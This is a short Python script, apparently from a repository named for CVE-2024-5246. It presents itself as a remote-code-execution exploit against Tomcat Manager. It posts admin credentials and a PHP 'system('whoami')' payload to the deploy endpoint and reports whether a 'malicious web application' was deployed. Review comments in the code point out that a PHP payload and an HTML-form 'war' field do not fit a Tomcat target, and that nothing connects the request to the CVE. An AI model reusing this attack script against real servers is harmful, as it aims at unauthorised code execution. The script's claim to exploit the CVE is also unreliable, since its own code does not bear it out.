README.md
README.md not found for CVE-2024-5246. The file may not exist in the repository.
import requests
# Operator-supplied settings. All three values below are placeholders as published.
# NOTE(review): the scheme is http://, so the Basic-auth credentials sent by
# exploit_rce() are only base64-encoded in transit, not encrypted.
target_url = "http://target-ip:port/manager/html"  # Tomcat Manager URL of the host under test
username = "admin"  # must be a valid Manager account; the request is authenticated
password = "password"  # must be that account's password

# Text embedded into the request body by exploit_rce().
# NOTE(review): this is PHP source, while the endpoint configured above is a
# Tomcat Manager URL; nothing on this page shows the server interpreting it.
payload = (
    "\n"
    "<?php\n"
    "// Payload to execute arbitrary PHP code\n"
    "system('whoami');\n"
    "?>\n"
)

# Manager deploy endpoint derived from target_url. The query string already
# carries path=/example; exploit_rce() sends the same path again as a form field.
deploy_url = target_url + "/deploy?path=/example&update=true"

# Request headers. Only the body encoding is declared here; the credentials
# are supplied separately through the `auth=` argument of the request.
headers = {"Content-Type": "application/x-www-form-urlencoded"}
def exploit_rce(url, username, password, payload):
    """
    Send one authenticated POST to ``url`` and print what the server answered.

    The request needs a valid Manager username and password, so what this
    function exercises is an authenticated deployment request.
    NOTE(review): the page names CVE-2024-5246 but does not show how this
    request relates to that CVE.

    Args:
        url (str): Full deploy URL of the Tomcat Manager.
        username (str): Manager account name, sent via HTTP Basic auth.
        password (str): Password for that account.
        payload (str): Text interpolated into the ``war`` form field.

    Returns:
        None. The status code, response body and a success/failure line are
        printed; ``requests.RequestException`` is caught and printed.
    """
    # Body fields, form-encoded by requests. The "war" value is an HTML <form>
    # snippet with the payload text placed inside an attribute.
    # NOTE(review): it is not an archive, and nothing on this page shows a
    # server accepting it.
    form_fields = {
        "path": "/example",
        "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>",
    }
    try:
        # A (user, password) tuple makes requests send HTTP Basic credentials.
        # `headers` is the module-level dict, not a parameter of this function.
        # NOTE(review): no timeout is passed, so an unresponsive peer can block
        # this call indefinitely.
        resp = requests.post(
            url,
            headers=headers,
            data=form_fields,
            auth=(username, password),
        )
        status = resp.status_code
        body = resp.text
        # The whole response body is echoed to stdout.
        print("Status Code:", status)
        print("Response Body:", body)
        # Success is inferred only from HTTP 200 plus a marker substring in
        # the body.
        deployed = status == 200 and "Deployed application" in body
        if not deployed:
            print("[-] Failed to deploy the malicious web application.")
        else:
            print("[+] Successfully deployed the malicious web application.")
    except requests.RequestException as exc:
        print(f"[-] An error occurred: {exc}")
if __name__ == "__main__":
    # Script entry point: announce the configured deploy URL, then issue the
    # single request using the module-level placeholder settings.
    banner = f"Exploiting RCE vulnerability at: {deploy_url}"
    print(banner)
    exploit_rce(url=deploy_url, username=username, password=password, payload=payload)